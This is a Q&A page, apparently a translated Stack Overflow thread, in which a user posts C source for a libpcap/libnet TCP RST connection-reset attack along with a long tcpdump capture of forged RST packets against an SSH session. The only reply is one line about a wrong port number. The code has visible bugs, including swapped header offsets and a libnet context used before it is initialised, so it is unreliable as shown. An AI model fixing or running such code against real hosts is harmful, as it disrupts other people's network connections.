通过libnet发送的Rst数据包不会重置连接

问题描述 投票:0回答:1

我正在尝试通过使用包含libcap和libnet的C脚本来进行“第一劫持”。我使用libcap嗅探所有通过命令行输入和发送给主机的数据包。然后,libnet将rst数据包发送到尝试连接到指定主机的主机。但是,当我运行脚本并通过ssh连接到给定的主机时,可以执行此操作而无需重置连接。我正在使用Kali Linux 2019.4 64位版本。这是代码:

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);

int main(int argc, char *argv[]) {
  struct pcap_pkthdr cap_header;
  const u_char *packet, *pkt_data;
  pcap_t *pcap_handle;
  char errbuf[PCAP_ERRBUF_SIZE];
  char *device;
  u_long target_ip;
  libnet_t *l;  /* libnet context */

  if (argc < 1) {
    printf("Usage: %s <target IP>\n", argv[0]);
    exit(0);
  }
  target_ip = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE);

  if (target_ip == -1)
    fatal("Invalid target address");

  device = pcap_lookupdev(errbuf);
  if (device == NULL)
    fatal(errbuf);

  pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
  if (pcap_handle == NULL)
    fatal(errbuf);
  l = libnet_init(LIBNET_RAW4, NULL, errbuf);
  if (l == NULL)
    fatal(errbuf);

  libnet_seed_prand(l);

  set_packet_filter(pcap_handle, (struct in_addr*)&target_ip);

  printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
  pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&l);

  pcap_close(pcap_handle);
  libnet_destroy(l);
  return 0;
}

int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
  struct bpf_program filter;
  char filter_string[100];

  sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));

  printf("[DEBUG]: filter string is \'%s\'\n", filter_string);
  if (pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
    fatal("pcap_compile failed");

  if (pcap_setfilter(pcap_hdl, &filter) == -1)
    fatal("pcap_setfilter failed");
}

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
  u_char *pkt_data;
  struct libnet_tcp_hdr *TCPhdr;
  struct libnet_ipv4_hdr *IPhdr;
  struct data_pass *passed;
  libnet_t **l_passed;
  int bcount;

  l_passed = (libnet_t **)user_args;

  TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H);
  IPhdr = (struct libnet_ipv4_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);

  printf("Reseting TCP connection from %s:%d ", inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
  printf("<---> %s:%d\n", inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));

  if (libnet_build_tcp(htons(TCPhdr->th_dport),
    htons(TCPhdr->th_sport),
    htonl(TCPhdr->th_ack),
    libnet_get_prand(LIBNET_PRu32),
    TH_RST,
    libnet_get_prand(LIBNET_PRu16),
    0,
    0,
    LIBNET_TCP_H,
    NULL,
    0,
    *l_passed,
    0) == -1) {
      fatal("in building tcp header");
    }
  if (libnet_build_ipv4(LIBNET_TCP_H+LIBNET_IPV4_H,
    IPTOS_LOWDELAY,
    libnet_get_prand(LIBNET_PRu16),
    0,
    libnet_get_prand(LIBNET_PR8),
    IPPROTO_TCP,
    0,
    *((u_long *)&(IPhdr->ip_src)),
    *((u_long *)&(IPhdr->ip_dst)),
    NULL,
    0,
    *l_passed,
    0) == -1) {
      fatal("in building ip header");
    }

    bcount = libnet_write(*l_passed);
    if (bcount < LIBNET_IPV4_H+LIBNET_TCP_H)
      printf("Warning: incomplete package written. (%d of %d bytes)\n", bcount, LIBNET_IPV4_H+LIBNET_TCP_H);

    libnet_clear_packet(*l_passed);

    usleep(5000);
}

当我像这样运行它时:

sudo ./rst_hijack 192.168.74.37

同时通过ssh连接到19.168.74.37,输出告诉我它正在重置连接,但是我仍然可以像往常一样在ssh连接中使用终端。现在我的问题是什么导致了该程序的行为,以及如何修复该程序以正确重置连接?这是运行的输出:

sudo tcpdump "dst host 192.168.74.37 || dst host 192.168.74.65" -i eth0 -nl

listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
08:44:52.624717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [S], seq 4267262989, win 64240, options [mss 1460,sackOK,TS val 1038758058 ecr 0,nop,wscale 7], length 0
08:44:52.639135 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1138266852, win 502, options [nop,nop,TS val 1038758073 ecr 120128956], length 0
08:44:52.640092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 59375, length 0
08:44:52.640118 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 0:32, ack 1, win 502, options [nop,nop,TS val 1038758074 ecr 120128956], length 32
08:44:52.648338 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 19838, length 0
08:44:52.670975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 44, win 502, options [nop,nop,TS val 1038758105 ecr 120128988], length 0
08:44:52.672025 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 18065, length 0
08:44:52.673352 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 32:1424, ack 44, win 502, options [nop,nop,TS val 1038758107 ecr 120128988], length 1392
08:44:52.676762 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1124, win 501, options [nop,nop,TS val 1038758110 ecr 120128993], length 0
08:44:52.680200 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 11726, length 0
08:44:52.685387 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 19899, length 0
08:44:52.722855 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1424:1472, ack 1124, win 501, options [nop,nop,TS val 1038758156 ecr 120129039], length 48
08:44:52.728049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 11027, length 0
08:44:52.757195 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1576, win 501, options [nop,nop,TS val 1038758191 ecr 120129074], length 0
08:44:52.760160 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 63708, length 0
08:44:52.761581 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1472:1488, ack 1576, win 501, options [nop,nop,TS val 1038758195 ecr 120129074], length 16
08:44:52.768033 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 55326, length 0
08:44:52.812954 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1488:1532, ack 1576, win 501, options [nop,nop,TS val 1038758247 ecr 120129129], length 44
08:44:52.814950 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 0
08:44:52.815093 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1532:1592, ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 60
08:44:52.816056 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 31111, length 0
08:44:52.821239 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 29341, length 0
08:44:52.824528 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1672, win 501, options [nop,nop,TS val 1038758258 ecr 120129140], length 0
08:44:52.826428 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 26394, length 0
08:44:52.832086 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 8500, length 0
08:44:57.864004 ARP, Request who-has 192.168.74.37 tell 192.168.74.69, length 28
08:44:59.170523 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1592:1676, ack 1672, win 501, options [nop,nop,TS val 1038764604 ecr 120129140], length 84
08:44:59.176106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 57729, length 0
08:44:59.275774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1700, win 501, options [nop,nop,TS val 1038764709 ecr 120135590], length 0
08:44:59.276091 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1676:1788, ack 1700, win 501, options [nop,nop,TS val 1038764710 ecr 120135590], length 112
08:44:59.280071 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 15752, length 0
08:44:59.285284 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 57521, length 0
08:44:59.808013 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2200, win 501, options [nop,nop,TS val 1038765242 ecr 120136080], length 0
08:44:59.809815 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2244, win 501, options [nop,nop,TS val 1038765243 ecr 120136126], length 0
08:44:59.810123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1788:2240, ack 2244, win 501, options [nop,nop,TS val 1038765244 ecr 120136126], length 452
08:44:59.816095 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269051, win 40356, length 0
08:44:59.821297 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 16013, length 0
08:44:59.826499 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 44708, length 0
08:44:59.826731 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2352, win 501, options [nop,nop,TS val 1038765260 ecr 120136140], length 0
08:44:59.826807 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2468, win 501, options [nop,nop,TS val 1038765260 ecr 120136141], length 0
08:44:59.826975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2856, win 501, options [nop,nop,TS val 1038765261 ecr 120136141], length 0
08:44:59.832084 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269203, win 21728, length 0
08:44:59.837289 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269319, win 57265, length 0
08:44:59.842548 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269707, win 20477, length 0
08:45:00.107292 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2964, win 501, options [nop,nop,TS val 1038765541 ecr 120136422], length 0
08:45:00.112102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 45488, length 0
08:45:00.980228 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2240:2276, ack 2964, win 501, options [nop,nop,TS val 1038766414 ecr 120136422], length 36
08:45:00.982783 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3000, win 501, options [nop,nop,TS val 1038766416 ecr 120137299], length 0
08:45:00.984104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 22888, length 0
08:45:00.989328 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 3332, length 0
08:45:01.060943 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2276:2312, ack 3000, win 501, options [nop,nop,TS val 1038766495 ecr 120137299], length 36
08:45:01.064097 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 31536, length 0
08:45:01.070127 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3036, win 501, options [nop,nop,TS val 1038766504 ecr 120137387], length 0
08:45:01.072099 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 58974, length 0
08:45:01.174452 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2312:2348, ack 3036, win 501, options [nop,nop,TS val 1038766608 ecr 120137387], length 36
08:45:01.176088 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 10923, length 0
08:45:01.176423 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3072, win 501, options [nop,nop,TS val 1038766610 ecr 120137493], length 0
08:45:01.184092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 36096, length 0
08:45:01.219113 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2348:2384, ack 3072, win 501, options [nop,nop,TS val 1038766653 ecr 120137493], length 36
08:45:01.223478 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3108, win 501, options [nop,nop,TS val 1038766657 ecr 120137539], length 0
08:45:01.224013 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 53739, length 0
08:45:01.229150 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 44679, length 0
08:45:01.453120 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2384:2420, ack 3108, win 501, options [nop,nop,TS val 1038766887 ecr 120137539], length 36
08:45:01.456107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 17777, length 0
08:45:01.456393 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3144, win 501, options [nop,nop,TS val 1038766890 ecr 120137772], length 0
08:45:01.464089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 9542, length 0
08:45:01.775818 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2420:2456, ack 3144, win 501, options [nop,nop,TS val 1038767209 ecr 120137772], length 36
08:45:01.776102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 31138, length 0
08:45:01.777681 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3180, win 501, options [nop,nop,TS val 1038767211 ecr 120138094], length 0
08:45:01.784090 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 473, length 0
08:45:01.807123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2456:2492, ack 3180, win 501, options [nop,nop,TS val 1038767241 ecr 120138094], length 36
08:45:01.808007 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 62491, length 0
08:45:01.809600 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3216, win 501, options [nop,nop,TS val 1038767243 ecr 120138126], length 0
08:45:01.816235 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 58091, length 0
08:45:01.929904 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2492:2528, ack 3216, win 501, options [nop,nop,TS val 1038767364 ecr 120138126], length 36
08:45:01.931774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3252, win 501, options [nop,nop,TS val 1038767365 ecr 120138248], length 0
08:45:01.936106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 7117, length 0
08:45:01.939199 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2528:2564, ack 3252, win 501, options [nop,nop,TS val 1038767373 ecr 120138248], length 36
08:45:01.941365 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 63243, length 0
08:45:01.941455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3288, win 501, options [nop,nop,TS val 1038767375 ecr 120138258], length 0
08:45:01.946686 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 12199, length 0
08:45:01.951897 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 56953, length 0
08:45:02.079717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2564:2600, ack 3288, win 501, options [nop,nop,TS val 1038767513 ecr 120138258], length 36
08:45:02.080174 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 51134, length 0
08:45:02.081735 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3324, win 501, options [nop,nop,TS val 1038767515 ecr 120138398], length 0
08:45:02.088089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 51600, length 0
08:45:02.217181 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2600:2636, ack 3324, win 501, options [nop,nop,TS val 1038767651 ecr 120138398], length 36
08:45:02.219087 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3360, win 501, options [nop,nop,TS val 1038767653 ecr 120138536], length 0
08:45:02.224100 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 8177, length 0
08:45:02.229315 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 12145, length 0
08:45:02.261653 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2636:2672, ack 3360, win 501, options [nop,nop,TS val 1038767695 ecr 120138536], length 36
08:45:02.263689 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3396, win 501, options [nop,nop,TS val 1038767697 ecr 120138580], length 0
08:45:02.263998 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 25986, length 0
08:45:02.269112 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 48796, length 0
08:45:02.270102 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2672:2708, ack 3396, win 501, options [nop,nop,TS val 1038767704 ecr 120138580], length 36
08:45:02.274243 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3432, win 501, options [nop,nop,TS val 1038767708 ecr 120138591], length 0
08:45:02.274263 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 47387, length 0
08:45:02.280269 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 54522, length 0
08:45:02.432123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2708:2744, ack 3432, win 501, options [nop,nop,TS val 1038767866 ecr 120138591], length 36
08:45:02.435146 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038767869 ecr 120138751], length 0
08:45:02.440109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 30791, length 0
08:45:02.445333 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 31531, length 0
08:45:02.649095 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2744:2780, ack 3468, win 501, options [nop,nop,TS val 1038768083 ecr 120138751], length 36
08:45:02.656101 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 35180, length 0
08:45:02.669801 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2780:2816, ack 3468, win 501, options [nop,nop,TS val 1038768103 ecr 120138751], length 36
08:45:02.672049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 56114, length 0
08:45:02.676520 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038768110 ecr 120138751,nop,nop,sack 1 {3504:3540}], length 0
08:45:02.680109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 50643, length 0
08:45:02.902946 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3540, win 501, options [nop,nop,TS val 1038768337 ecr 120139219], length 0
08:45:02.904054 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 33161, length 0
08:45:03.261163 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2816:2852, ack 3540, win 501, options [nop,nop,TS val 1038768695 ecr 120139219], length 36
08:45:03.264017 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 24146, length 0
08:45:03.264404 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3576, win 501, options [nop,nop,TS val 1038768698 ecr 120139581], length 0
08:45:03.269455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3660, win 501, options [nop,nop,TS val 1038768703 ecr 120139585], length 0
08:45:03.270931 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3768, win 501, options [nop,nop,TS val 1038768705 ecr 120139588], length 0
08:45:03.272009 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270427, win 61053, length 0
08:45:03.277137 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270511, win 27067, length 0
08:45:03.282302 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 37574, length 0
08:45:03.748917 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2852:2888, ack 3768, win 501, options [nop,nop,TS val 1038769183 ecr 120139588], length 36
08:45:03.751160 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3804, win 501, options [nop,nop,TS val 1038769185 ecr 120140068], length 0
08:45:03.752077 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 58993, length 0
08:45:03.757298 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 62372, length 0
08:45:03.919971 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769354 ecr 120140068], length 36
08:45:03.928109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 29405, length 0
08:45:04.132019 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769566 ecr 120140068], length 36
08:45:04.136107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 54770, length 0
08:45:04.362957 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3840, win 501, options [nop,nop,TS val 1038769797 ecr 120140679], length 0
08:45:04.368104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270691, win 26246, length 0
c linux gcc libpcap libnet
1个回答
0
投票

第一个数据包的端口号错误。

最新问题
© www.soinside.com 2019 - 2024. All rights reserved.